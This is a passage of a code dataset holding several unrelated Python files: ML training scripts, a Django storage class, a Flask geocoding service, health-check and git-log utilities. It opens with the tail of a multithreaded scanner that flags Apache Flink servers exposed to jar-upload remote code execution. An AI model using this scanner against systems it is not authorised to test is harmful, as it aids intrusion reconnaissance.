re.findall(r'\"flink-version\":\"(.*?)\",\"', res.text)[0]\r\n\t\t# print (\"[+]\" + url1 + ' ' + version)\r\n\t\tlist1 = version.split('.') #version格式为1.x.1 用split切割成数组\r\n\t\tif int(list1[1]) <= 10:#取中间为与10比较 小于等于10为true\r\n\t\t\ttry:\r\n\t\t\t\tres3 = requests.get(url2,timeout=15,verify=False)\r\n\t\t\t\tif re.search(r'web-submit',res3.text,re.I):\r\n\t\t\t\t\tpoc = re.findall(r'\"web-submit\":(.*?)}', res3.text)[0]\r\n\t\t\t\t\tif poc == \"false\":\r\n\t\t\t\t\t\tprint (\"[-]%s version:%s Target is Not vuln\" %(url1,version))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint (\"\\033[32m[+]%s version:%s Target is vuln!\\033[0m\" %(url1,version))\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint (\"\\033[32m[+]%s version:%s Target is vuln!\\033[0m\" %(url1,version))\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint (\"[-]%s version:%s Target is Not vuln\" %(url1,version))\r\n\t\t# t.write(\"%s %s\\n\" %(url,flag))\r\n\texcept Exception as e:\r\n\t\tprint(\"[-]%s is timeout\" %url1)\r\n\r\n\r\n#多线程\r\ndef multithreading(url_list, pools=5):\r\n\tworks = []\r\n\tfor i in url_list:\r\n\t\t# works.append((func_params, None))\r\n\t\tworks.append(i)\r\n\t# print(works)\r\n\tpool = threadpool.ThreadPool(pools)\r\n\treqs = threadpool.makeRequests(check_vuln, works)\r\n\t[pool.putRequest(req) for req in reqs]\r\n\tpool.wait()\r\n\r\n\r\nif __name__ == '__main__':\r\n\tshow = r'''\r\n\t ___ _ ______ _ _ _ \r\n\t / _ \\ | | | ___| (_) | | \r\n\t / /_\\ \\_ __ __ _ ___| |__ ___| |_ | |_ _ __ | | __ _ __ ___ ___ \r\n\t | _ | '_ \\ / _` |/ __| '_ \\ / _ \\ _| | | | '_ \\| |/ / | '_ \\ / _ \\ / __|\r\n\t | | | | |_) | (_| | (__| | | | __/ | | | | | | | < | |_) | (_) | (__ \r\n\t \\_| |_/ .__/ \\__,_|\\___|_| |_|\\___\\_| |_|_|_| |_|_|\\_\\ | .__/ \\___/ \\___|\r\n\t | | ______| | \r\n\t |_| |______|_| \r\n\t \r\n\t \r\n ApacheFlink_Jar_upload_RCE_poc By m2\r\n\t'''\r\n\tprint(show + '\\n')\r\n\targ=ArgumentParser(description='ApacheFlink_Jar_upload_RCE_poc By m2')\r\n\targ.add_argument(\"-u\",\r\n\t\t\t\t\t\t\"--url\",\r\n\t\t\t\t\t\thelp=\"Target URL; Example:http://ip:port\")\r\n\targ.add_argument(\"-f\",\r\n\t\t\t\t\t\t\"--file\",\r\n\t\t\t\t\t\thelp=\"Target URL; Example:url.txt\")\r\n\targs=arg.parse_args()\r\n\turl=args.url\r\n\tfilename=args.file\r\n\tstart=time()\r\n\tif url != None and filename == None:\r\n\t\tcheck_vuln(url)\r\n\telif url == None and filename != None:\r\n\t\tfor i in open(filename):\r\n\t\t\ti=i.replace('\\n','')\r\n\t\t\turl_list.append(i)\r\n\t\tmultithreading(url_list,10)\r\n\tend=time()\r\n\tprint('任务完成,用时%d' %(end-start))","sub_path":"ApacheFlink_poc.py","file_name":"ApacheFlink_poc.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339781111","text":"import os\nfrom configobj import ConfigObj\nfrom validate import Validator\nfrom typing import Any\n\nfrom resistics.common.print import generalPrint, errorPrint\nfrom resistics.common.io import checkFilepath\n\n\ndef getDefaultConfigFilepath() -> str:\n \"\"\"Get the default global configuration option\n\n Returns\n -------\n str\n Path to global config file\n \"\"\"\n # use relative path from here\n path = os.path.split(__file__)[0]\n globalConfigFile = os.path.join(path, \"..\", \"resisticsConfig.ini\")\n if not checkFilepath(globalConfigFile):\n errorPrint(\n \"getDefaultConfig\",\n \"Default configuration file could not be found\",\n quitrun=True,\n )\n return globalConfigFile\n\n\ndef loadConfig(filepath: str = \"\") -> ConfigObj:\n \"\"\"Get 
configuration information\n\n Parameters\n ----------\n filepath : str, optional\n The path to the configuration file\n\n Returns\n -------\n config : ConfigObj\n ConfigObj with global configuration parameters\n \"\"\"\n configFile = getDefaultConfigFilepath()\n if filepath == \"\" or not checkFilepath(filepath):\n config = ConfigObj(configspec=configFile)\n else:\n config = ConfigObj(filepath, configspec=configFile)\n generalPrint(\"loadConfig\", \"Loading configuration file {:s}\".format(filepath))\n validator = Validator()\n result = config.validate(validator)\n if not result:\n errorPrint(\"loadConfigFile\", \"Config file validation failed\", quitrun=True)\n return config\n","sub_path":"resistics/config/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204605744","text":"# : Harvey Chang\n# : chnme40cs@gmail.com\n# this file is used to pre_train the parameters for WRNN:\nimport numpy as np\nimport tensorflow as tf\nfrom plant import prepare_pre_train_data\nfrom matplotlib import pyplot as plt\nfrom wavelet import wavelet\n\n\ndef predict_model(layer):\n\n hidden_dim = [128]\n pre_dim = [1]\n with tf.variable_scope('rnn/wrnn'):\n for dim, p_dim in zip(hidden_dim, pre_dim):\n mid_layer = tf.layers.dense(layer, dim,\n activation=tf.nn.relu,\n kernel_initializer=tf.contrib.keras.initializers.glorot_uniform())\n # add wavelet:\n layer, eval_value = wavelet(mid_layer)\n output = tf.layers.dense(layer, 1, kernel_initializer=tf.contrib.keras.initializers.glorot_uniform())\n\n return output, eval_value\n\n\n# main function:\n# test on minist:\ndef main():\n learning_rate = 0.01\n batch_size = 30\n\n # data preparation\n data_range = 1000 # predict a data of range 1000\n data_num = 500\n # training_epochs = 850\n training_epochs = 1000\n look_back = 2 # using 2 previous x\n y_look_back = 3 # using 3 previous y\n timesteps = data_range - y_look_back # time steps\n\n # data prepared:\n # define model:\n # expected data format:(batch_size, time_steps, data_dim)\n\n X = tf.placeholder(tf.float32, [batch_size, timesteps, look_back+y_look_back])\n Y = tf.placeholder(tf.float32, [batch_size, timesteps, 1])\n\n outputs, eval_value = predict_model(X)\n\n loss = tf.nn.l2_loss((Y - outputs))\n opt = tf.train.AdagradOptimizer(learning_rate=learning_rate, initial_accumulator_value=1e-6)\n train_op = opt.minimize(loss)\n\n # saver define:\n # save the parameters:\n param_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n saver = tf.train.Saver(param_list)\n print(param_list)\n # start training:\n init = tf.global_variables_initializer()\n\n # data preparation:\n dataX, dataY, original_X = prepare_pre_train_data(num=data_num,\n data_range=data_range,\n look_back=look_back,\n noise_level=0)\n val_dataX, val_dataY, val_original_X = prepare_pre_train_data(num=batch_size,\n data_range=data_range,\n look_back=look_back,\n noise_level=0)\n\n with tf.Session() as sess:\n sess.run(init)\n # global step\n step = 0\n # print('init value is {}'.format(sess.run(eval_value)))\n while(step < training_epochs):\n for i in range(int((1.0*data_num)/batch_size)):\n datax = dataX[i*batch_size:(i+1)*batch_size]\n datay = dataY[i * batch_size:(i + 1) * batch_size]\n # dynamic data generating:\n _, r_loss, pred = sess.run([train_op, loss, outputs], feed_dict={\n X: datax,\n Y: datay\n })\n\n # after training one epoch: exam the validation set:\n val_loss, pred = sess.run([loss, outputs], feed_dict={\n 
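# Editor's note (added): this pass feeds the whole 30-sample validation set in one session.run call; tf.nn.l2_loss is a sum of squares over the batch, not a mean, so val_loss is only comparable between runs that keep batch_size fixed.\n 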
X: val_dataX,\n Y: val_dataY\n })\n print('training is {}|validation: {}| step: {}'.format(r_loss, val_loss, step))\n step += 1\n\n # save:\n saver.save(sess, 'train_log/pre_WRNN_v2')\n\n # see the result:\n plt.plot(pred[0] - val_dataY[0], label='error')\n plt.legend(loc='upper right')\n plt.show()\n\n\nif __name__ == '__main__':\n main()","sub_path":"pre_WRNN_v2.py","file_name":"pre_WRNN_v2.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"178465190","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\n\nfrom django.contrib.staticfiles.storage import StaticFilesStorage\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\n\nclass WebpackHashStorage(StaticFilesStorage):\n \"\"\"\n Simple StaticFilesStorage based class that can be used together with the assets-webpack-plugin to include\n hashed files.\n The WEBPACK_ASSETS_FILE setting must be set and point to a valid json file.\n In the templates, entry point assets can then be referenced with their webpack name plus the appropriate suffix -\n e.g. with {% static 'entry1.js' %}\n \"\"\"\n\n def __init__(self, assets_file=None, *args, **kwargs):\n # check if assets file present\n if assets_file is None:\n self.assets_file = settings.WEBPACK_ASSETS_FILE\n self.check_assets()\n self.load_json()\n super(WebpackHashStorage, self).__init__(*args, **kwargs)\n\n def check_assets(self):\n \"\"\"\n Throws an exception if assets file is not configured or cannot be found.\n :param assets: path to the assets file\n \"\"\"\n if not self.assets_file:\n raise ImproperlyConfigured(\"You must specify the path to the assets.json file via WEBPACK_ASSETS_FILE\")\n elif not os.path.exists(self.assets_file):\n raise ImproperlyConfigured(\n \"The file `{file}` was not found, make sure \"\n \"to run the webpack build before the collectstatic command\".format(\n file=self.assets_file))\n\n def load_json(self):\n with open(self.assets_file) as json_file:\n self.assets = json.load(json_file)\n\n def _get_name_with_hash(self, name):\n asset_dir, asset_file = os.path.split(name)\n if asset_file in self.assets:\n return \"{}/{}\".format(asset_dir, self.assets.get(asset_file))\n return name\n\n def url(self, name):\n \"\"\"\n :param name: either the name of the webpack entry point (plus suffix like .js or .sourcemap) or the name of\n any other static file\n :return: path using the filename found in the assets.json file generated by webpack, if the name is not\n present in the json file, then the call is delegated to the super class.\n \"\"\"\n asset_type, file_path = os.path.split(name)\n if \"assets\" in asset_type:\n name = self._get_name_with_hash(name)\n return super(WebpackHashStorage, self).url(name)\n","sub_path":"vmmaster_frontend/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"400855119","text":"\"\"\"\nExercise on Classes and Objects from Think Python Edition 2\n\nExercise 15.2\n\n\"\"\"\n\nimport turtle\n\nfrom Point import Point, Rectangle\nfrom Circle import Circle\n\nimport polygon\n\ndef draw_circle(t, circle):\n \"\"\"\n draws a circle\n \"\"\"\n t.pu()\n t.goto(circle.center.x, circle.center.y)\n t.fd(circle.radius)\n t.lt(90)\n t.pd()\n polygon.circle(t, circle.radius)\n\ndef draw_rect(t, rect):\n \"\"\"\n draws a rectangle\n \"\"\"\n t.pu()\n t.goto(rect.corner.x, 
rect.corner.y)\n t.setheading(0) # set orientation to east (90 north; 180 west; 270 south)\n t.pd()\n\n for length in rect.width, rect.length, rect.width, rect.length:\n t.fd(length)\n t.rt(90)\n\n\nif __name__ == '__main__':\n bob = turtle.Turtle()\n\n #draw the axes\n length = 400\n bob.fd(length)\n bob.bk(length)\n bob.lt(90)\n bob.fd(length)\n bob.bk(length)\n\n #draw circle\n circle = Circle()\n circle.center = Point()\n circle.center.x = 150\n circle.center.y = 100\n circle.radius = 75\n\n draw_circle(bob, circle)\n\n #draw rectangle\n box = Rectangle()\n box.width = 100\n box.length = 200\n box.corner = Point()\n box.corner.x = 50\n box.corner.y = 50\n\n draw_rect(bob, box)\n\n #wait for user to close the window\n turtle.mainloop()\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"390586142","text":"\"\"\"\nComponents to gather data from a component or service.\n\"\"\"\n\nimport threading\nimport time\nfrom .service_info import DynamicServiceInfo\nfrom .component_details import DynamicComponentsDetails\nfrom .data_trigger import DataTrigger\n\n\nclass HealthMonitor(threading.Thread):\n \"\"\"\n Class responsible for periodically executing a particular function to\n get variable measurements, such as memory consumption.\n \"\"\"\n\n def __init__(self,\n periodicity: int,\n dynamic_component_details: DynamicComponentsDetails,\n data_trigger: DataTrigger,\n collect_func):\n threading.Thread.__init__(self)\n self.dynamic_component_details = dynamic_component_details\n self.data_trigger = data_trigger\n self.collect_func = collect_func\n self.periodicity = periodicity\n self.should_stop = False\n self.lock = threading.RLock()\n\n def run(self):\n \"\"\"\n Start retrieving monitor data\n \"\"\"\n self.lock.acquire()\n while self.should_stop is False:\n self.lock.release()\n self.dynamic_component_details.observed_value = self.collect_func(\n self.data_trigger)\n time.sleep(self.periodicity)\n self.lock.acquire()\n self.lock.release()\n\n def stop(self):\n \"\"\"\n Stop this monitor.\n\n Actually this will indicate that the thread should exit. It doesn't\n force the thread to be killed.\n \"\"\"\n self.lock.acquire()\n self.should_stop = True\n self.lock.release()\n\n\nclass HealthChecker:\n \"\"\"\n Class responsible for starting and stopping monitors.\n \"\"\"\n\n def __init__(self, service_info: DynamicServiceInfo):\n self.service_info = service_info\n self.threads = []\n\n def create_monitor(self,\n component_details: DynamicComponentsDetails,\n collect_func=None,\n periodicity=None):\n \"\"\"\n Register a new monitor to be executed.\n\n If collect_func and periodicity are *both* set, then a new thread is\n started executing the function in a periodic way. 
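Example usage (editor's sketch; the collect_mem callback and the details/service_info objects are illustrative, not part of this module):\n\n def collect_mem(trigger):\n import resource\n return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n\n checker = HealthChecker(service_info)\n checker.create_monitor(details, collect_func=collect_mem, periodicity=30)\n\n 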
If not, nothing happens\n and the returned DataTrigger object should be used whenever the observed\n value changes.\n\n :type component_details: DynamicComponentsDetails\n :param component_details: The component details object to be associated\n to the new monitor\n :type collect_func: (dataTrigger: DataTriger) => any\n :param collect_func: The function to be executed when getting the data\n :type periodicity: int\n :param periodicity: Time in seconds between each callback execution.\n \"\"\"\n monitor_id = f'{component_details.component_name}:{component_details.measurement_name}'\n if self.service_info.detail is None:\n self.service_info.detail = {}\n\n self.service_info.detail[monitor_id] = component_details\n data_trigger = DataTrigger(self.service_info, self.service_info.detail[monitor_id])\n if (collect_func is not None) and (periodicity is not None):\n # Start collect thread\n thr = HealthMonitor(\n periodicity, self.service_info.detail[monitor_id], data_trigger, collect_func)\n self.threads.append(thr)\n thr.start()\n return data_trigger\n\n def stop_monitor(self):\n \"\"\"\n Stop all monitors\n \"\"\"\n for thread in self.threads:\n thread.stop()\n","sub_path":"dojot/module/healthcheck/healthchecker.py","file_name":"healthchecker.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483787449","text":"from flask import Flask, flash, redirect, render_template, request, session, abort, send_from_directory, jsonify, Response\nfrom flask_cors import CORS\nimport reverse_geocoder as rg\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/geo-service')\ndef hello():\n lat = request.args.get('lat')\n long = request.args.get('long')\n if lat == None or long == None:\n return jsonify(error=\"Please provide lat & long information!\", result=\"failed\"), 400\n try:\n coordinates = (float(lat), float(long))\n results = rg.search(coordinates)\n return jsonify(data=results[0], result=\"sucess\"), 200\n except:\n return jsonify(error=\"Error getting the location details\", result=\"failed\"), 500\n\n\nif __name__ == '__main__':\n app.jinja_env.auto_reload = True\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n app.config['PROPAGATE_EXCEPTIONS'] = True\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"geo-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"208228318","text":"\"\"\"Convenience class for calling rook preprocess\n\nExample usage:\n\nfrom tworaven_apps.R_services.preprocess_util import PreprocessUtil\nsrc_file = '/ravens_volume/test_data/185_baseball/TRAIN/dataset_TRAIN/tables/learningData.csv'\n\nputil = PreprocessUtil(src_file)\nif putil.has_error():\n print('error found: ', putil.get_error_message())\nelse:\n # Preprocess data as a python dict\n #\n print('preprocess data (python dict)', putil.get_preprocess_data())\n\n # Preprocess data as a JSON string\n #\n print('preprocess data (json string)', putil.get_preprocess_data_as_json())\n\n # Preprocess data as a JSON string indented 4 spaces\n #\n print('preprocess data (json string)', putil.get_preprocess_data_as_json(4))\n\n---\n10/2019 - Updated to use:\n - rook preprocess OR\n - tworavens-preprocess via pypi: https://pypi.org/project/tworavens-preprocess/\n\n\"\"\"\nfrom os.path import isfile\nimport requests\n\n# source: https://pypi.org/project/tworavens-preprocess/\nfrom 
raven_preprocess.preprocess_runner import PreprocessRunner\n\nfrom tworaven_apps.data_prep_utils.duplicate_column_remover import DuplicateColumnRemover\nfrom tworaven_apps.utils.basic_err_check import BasicErrCheck\nfrom tworaven_apps.utils.json_helper import json_dumps, json_loads\n\n\n\nclass PreprocessUtil(BasicErrCheck):\n \"\"\"Convenience class for rook preprocess\"\"\"\n def __init__(self, source_path, **kwargs):\n \"\"\"Takes a path to a data file and runs preprocess\n\n - datastub - a unique directory that rookpreprocess uses to write\n - use_python_preprocess - boolean, default False.\n - use python package for preprocessing.\n \"\"\"\n self.source_path = source_path\n\n # R preprocess specific value\n self.datastub = kwargs.get('datastub', None)\n self.vars = kwargs.get('variables')\n\n # Flag - should python preprocess be used\n self.use_python_preprocess = kwargs.get('use_python_preprocess', True)\n\n # Option to read 1st line of file and fix duplicate columns names\n #\n self.fix_duplicate_columns = kwargs.get('fix_duplicate_columns', True)\n\n self.rook_app_info = None\n self.preprocess_data = None\n\n self.column_names = None\n\n self.run_preprocess()\n\n\n def get_preprocess_data_as_json(self, indent=None):\n \"\"\"Return the preprocess data as a JSON string\"\"\"\n assert not self.has_error(),\\\n 'Make sure \"has_error()\" is False before calling this method'\n\n json_str_info = json_dumps(self.preprocess_data,\n indent=indent)\n if json_str_info.success:\n return json_str_info.result_obj\n\n # SHOULDN'T HAPPEN!\n return json_str_info.err_msg\n\n def get_preprocess_data(self):\n \"\"\"Return the preprocess data as a python dict\"\"\"\n\n assert not self.has_error(),\\\n 'Make sure \"has_error()\" is False before calling this method'\n return self.preprocess_data\n\n def get_call_data(self):\n \"\"\"Format data for rook call\"\"\"\n if self.has_error():\n return None\n\n info = dict(data=self.source_path,\n datastub=self.datastub)\n\n if self.column_names:\n info['columns'] = self.column_names\n\n json_str_info = json_dumps(info)\n if json_str_info.success:\n return info\n\n # Failed JSON string conversion\n #\n self.add_error_message(json_str_info.err_msg)\n return None\n\n\n def run_preprocess(self):\n \"\"\"Run preprocess steps\"\"\"\n if self.has_error():\n return\n\n # Make sure file exists\n #\n if not (self.source_path and isfile(self.source_path)):\n self.add_error_message('File not found: %s' % self.source_path)\n return\n\n # Fix duplicate columns\n #\n if self.fix_duplicate_columns:\n dcr = DuplicateColumnRemover(self.source_path)\n self.column_names = dcr.updated_columns\n\n self.column_names = [requests.utils.quote(column) for column in self.column_names]\n\n if dcr.has_error():\n user_msg = (f'Augment error during column checks: '\n f'{dcr.get_error_message()}')\n self.add_error_message(user_msg)\n return\n\n # https://pypi.org/project/tworavens-preprocess/\n #\n run_info = PreprocessRunner.load_from_file(self.source_path, user_vars=self.vars)\n\n if not run_info.success:\n self.add_err_msg(run_info.err_msg)\n print('preprocess failed')\n print(run_info)\n return\n\n runner = run_info.result_obj\n\n # retrieve the data as a python OrderedDict\n #\n self.preprocess_data = runner.get_final_dict()\n\n\n\"\"\"\nfrom tworaven_apps.R_services.preprocess_util import PreprocessUtil\nsrc_file = 
'/ravens_volume/test_data/185_baseball/TRAIN/dataset_TRAIN/tables/learningData.csv'\n\n\n\"\"\"\n","sub_path":"tworaven_apps/R_services/preprocess_util.py","file_name":"preprocess_util.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"395940435","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\n\n\nimport tensorflow.keras.layers as layers\n# from tensorflow.keras.layers import Dense, Activation,Dropout, Flatten,MaxPooling1D\nfrom tensorflow.keras.layers import Dense, Embedding, Dropout, Activation,Flatten, Conv1D, GlobalMaxPooling1D,Dropout\nimport datasets\n\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport setting\nimport pickle\n\n# # test\n# num_features = 3000\n# sequence_length = 300\n# embedding_dimension = 100\n# (x_train, y_train), (x_test, y_test) = keras.datasets.imdb.load_data(num_words=num_features)\n# print(x_train)\n# print(x_train.shape)\n# print(len(x_train[0]))\n# x_train = pad_sequences(x_train, maxlen=sequence_length)\n# x_test = pad_sequences(x_test, maxlen=sequence_length)\n# print(x_train)\n# print(x_train.shape)\n# print(len(x_train[0]))\n# exit()\n\n\n\n\n\n\n#param\n\n\n\n\n\n\n\n# # datasets\n# # trainX,testX,trainY,testY\n# for x1 in datasets.trainX[:5]:\n# # print(x1)\n# print(len(x1))\n# # print(len(datasets.trainX))\n# # print(len(datasets.testX))\n# print(datasets.trainX)\n# print(datasets.trainY)\n# print(datasets.trainX.shape)\n# print(len(datasets.trainX[0]))\n# print(len(datasets.trainX[2]))\n# print(datasets.trainX[0])\n# print(datasets.trainX[2])\n\n# for x in datasets.trainY:print(x)\n\n\n# exit()\n\n\n\n####### tf model process ########\ndef CNN():\n # model parameters:\n nb_words =len(datasets.tokenizer.word_index)+1\n embedding_dims = setting.embedding_dims\n cnn_filters = 100\n cnn_kernel_size = 5\n dense_hidden_dims = 200\n maxlen =setting.maxlen\n print('Build model...')\n model = tf.keras.Sequential()\n model.add(layers.Embedding(nb_words,embedding_dims,input_length=maxlen))\n model.add(layers.Dropout(0.5))\n model.add(layers.Conv1D(cnn_filters, cnn_kernel_size,padding='valid', activation='relu'))\n model.add(layers.GlobalMaxPooling1D())\n model.add(layers.Dense(dense_hidden_dims))\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(64,activation='relu'))\n model.add(layers.Dense(1))\n model.add(layers.Dense(setting.class_length,activation='sigmoid'))\n return model\n\ndef FastText():\n maxlen =setting.maxlen\n embedding_dims = setting.embedding_dims\n max_features = len(datasets.tokenizer.word_index)+1\n model = tf.keras.Sequential()\n model.add(layers.Embedding(max_features,embedding_dims,input_length=maxlen))\n model.add(layers.GlobalAveragePooling1D())\n model.add(layers.Dense(setting.class_length, activation='sigmoid'))\n return model\n\ndef RNN():\n max_features = len(datasets.tokenizer.word_index)+1\n embedding_dims = setting.embedding_dims\n # embedding_dims_2 = 30\n \n model = tf.keras.Sequential()\n model.add(layers.Embedding(max_features,embedding_dims))\n model.add(layers.Bidirectional(layers.LSTM(embedding_dims)))\n # model.add(layers.Bidirectional(layers.LSTM(embedding_dims,return_sequences=True)))\n # model.add(layers.Bidirectional(layers.LSTM(20)))\n model.add(layers.Dense(10, activation='relu'))\n model.add(layers.Dense(setting.class_length, activation='sigmoid'))\n return model\n\n\n\n\n\n\n# tfModel = FastText() #0.9683\n# tfModel = 
CNN()\ntfModel = RNN() #0.9874 #0.9992 \n\ntfModel.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n\n# train\nhistory1 = tfModel.fit(datasets.trainX,datasets.trainY,\n epochs=setting.train_epochs,\n # validation_data=[],\n # verbose=1\n batch_size=100,\n )\n\n\n#evaluate\n# print(len(datasets.testX))\n# print(datasets.testY)\nresults = tfModel.evaluate(datasets.testX,datasets.testY,verbose=0)\nprint(results)\n\n#\nfor name, value in zip(tfModel.metrics_names, results):\n print(\"%s: %.3f\" % (name, value))\n\n\n#plot \ndef plot_graphs(history, name):\n plt.plot(history.history[name])\n # plt.plot(history.history['validation'+ name])\n # plt.xlabel(\"Epochs\")\n # plt.ylabel(name)\n # plt.legend([name, 'validation - ' + name])\n plt.show()\n\n\ndef modelsave(configpath):\n # saving\n with open(configpath+'/tokenizer.pickle', 'wb') as handle:\n pickle.dump(datasets.tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n tf.keras.models.save_model(tfModel, configpath+\"/model.h5\", save_format=\"h5\")\n\n with open(configpath+\"/config.file\", \"wb\") as f:\n pickle.dump({'categories':setting.categories,'maxlen':setting.maxlen}, f)\n\n# plot_graphs(history1, 'accuracy')\nmodelsave('./modelconfigsave')\n","sub_path":"classification/patient/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647397126","text":"from modax.training.losses.utils import precision, normal_LL\nfrom modax.linear_model.SBL import SBL\nimport jax.numpy as jnp\nimport jax\n\n\ndef BIC(prediction, y, u_t, theta, alpha, alpha_threshold=1e4):\n n_samples = theta.shape[0]\n\n # MSE part\n mse = jnp.mean((prediction - y) ** 2)\n\n # Reg part\n mask = alpha < alpha_threshold\n coeffs, reg = jax.lax.cond(jnp.sum(mask) == 0, lambda x: jnp.linalg.lstsq(theta, u_t)[:2], lambda x: jnp.linalg.lstsq(theta * jnp.where(x == 0, 1e-6, 1.0), u_t)[:2], mask)\n reg = reg / n_samples\n coeffs = coeffs.squeeze() * mask\n\n # BIC\n BIC = n_samples * (jnp.log(mse) + jnp.log(reg)) + jnp.log(n_samples) * jnp.sum(mask)\n\n return (\n BIC.squeeze(),\n (mse.squeeze(), reg.squeeze()),\n coeffs,\n )\n\n\ndef loss_fn_SBL(params, state, model, X, y, warm_restart=True):\n model_state, loss_state = state\n variables = {\"params\": params, **model_state}\n (prediction, dt, theta, coeffs), updated_model_state = model.apply(\n variables, X, mutable=list(model_state.keys())\n )\n\n n_samples, n_features = theta.shape\n\n # MSE stuff\n tau = precision(y, prediction, 0.0, 0.0)\n p_mse, MSE = normal_LL(prediction, y, tau)\n\n # Regression stuff\n # we dont want the gradient\n beta_prior = (\n n_samples / 2,\n n_samples / (jax.lax.stop_gradient(tau)),\n )\n\n if warm_restart:\n prior_init = loss_state[\"prior_init\"]\n else:\n prior_init = None\n\n p_reg, mn, prior, fwd_metric = SBL(\n theta,\n dt,\n prior_init=prior_init,\n hyper_prior=((1e-6, 1e-6), beta_prior),\n tol=1e-4,\n max_iter=300,\n )\n reg = jnp.mean((dt - jnp.dot(theta, coeffs)) ** 2)\n BIC_val, (mse, masked_reg), masked_coeffs = BIC(\n prediction, y, dt, theta, prior[:-1], 1e4\n )\n updated_loss_state = {\"prior_init\": prior}\n loss = -(p_mse + p_reg)\n metrics = {\n \"loss\": loss,\n \"p_mse\": p_mse,\n \"mse\": mse,\n \"p_reg\": p_reg,\n \"coeffs\": coeffs,\n \"reg\": reg,\n \"masked_reg\": masked_reg,\n \"bayes_coeffs\": mn,\n \"masked_coeffs\": masked_coeffs,\n \"alpha\": prior[:-1],\n \"beta\": prior[-1],\n \"tau\": tau,\n \"its\": 
fwd_metric[0],\n \"BIC\": BIC_val,\n }\n\n return (\n loss,\n (\n (updated_model_state, updated_loss_state),\n metrics,\n (prediction, dt, theta, mn),\n ),\n )\n","sub_path":"src/modax/training/losses/.ipynb_checkpoints/SBL-checkpoint.py","file_name":"SBL-checkpoint.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"571424353","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''format: \n \n python filename version number cumulative or not.\n \n example :python homework1.py v4.4 10 --c=c\n'''\n\nimport matplotlib.pyplot as plt\n\nimport re, sys\nfrom subprocess import Popen, DEVNULL, PIPE\nfrom argparse import ArgumentParser\n\nclass ContentException(BaseException):\n def __str__(self):\n error = 'Please check if the argument is appropriate.'\n return error\n \nclass GetGitLog:\n def __init__(self):\n # Set the arguments required for the class.\n parser = ArgumentParser(description=\"parse\")\n parser.add_argument('revision', help='the vision we want to count.')\n parser.add_argument('rev_range', type=str, help='how many sublevels we want to count')\n parser.add_argument('-c', '--cumulative', type=str, help='whether we chose cumulative or not.')\n args = parser.parse_args()\n self.basetime = 1452466892\n #Passing arguments in a class\n self.rev = args.revision\n try:\n rev_range = int(args.rev_range)\n except (ValueError, UnboundLocalError):\n err = 'Please let -r be a integer.'\n print(err)\n if args.cumulative == \"c\":\n cumulative = 1\n else:\n cumulative = 0\n print(\"Dont know what you mean with %s\" % args.cumulative)\n sys.exit(-1)\n \n \n self.get_log(cumulative, rev_range)\n \n \n \n \n def get_commit_cnt(self, git_cmd):\n try:\n raw_counts = git_cmd.communicate()[0]\n if raw_counts == 0:\n raise ContentException\n except ContentException as err:\n print(err)\n sys.exit(2)\n # if we request something that does not exist -> 0\n else:\n cnt = re.findall('[0-9]*-[0-9]*-[0-9]*', str(raw_counts))\n return len(cnt)\n\n def get_tag_days(self, git_cmd, base):\n try:\n seconds = git_cmd.communicate()[0]\n SecPerHour = 3600\n if seconds == 0:\n raise ContentException\n except ContentException as err:\n print(err)\n sys.exit(2)\n return (int(seconds)-base)//SecPerHour\n \n def get_log(self, cumulative, rev_range):\n # setup and fill in the table\n #print(\"#sublevel commits %s stable fixes\" % self.rev)\n #print(\"lv hour bugs\") #tag for R data.frame\n rev1 = self.rev\n \n # base time of v4.1 and v4.4 as ref base\n # fix this to extract the time of the base commit from git !\n # hofrat@Debian:~/git/linux-stable$ git log -1 --pretty=format:\"%ct\" v4.4\n # 1452466892\n #\n self.sublevels ,self.release_days,self.commits =[],[],[]\n for sl in range(1,rev_range+1):\n rev2 = self.rev + \".\" + str(sl)\n gitcnt = \"git rev-list --pretty=format:\\\"%ai\\\" \" + rev1 + \"...\" + rev2\n gittag = \"git log -1 --pretty=format:\\\"%ct\\\" \" + rev2\n #print(gitcnt)\n git_rev_list = Popen(gitcnt, stdout=PIPE, stderr=DEVNULL, shell=True)# grap it\n 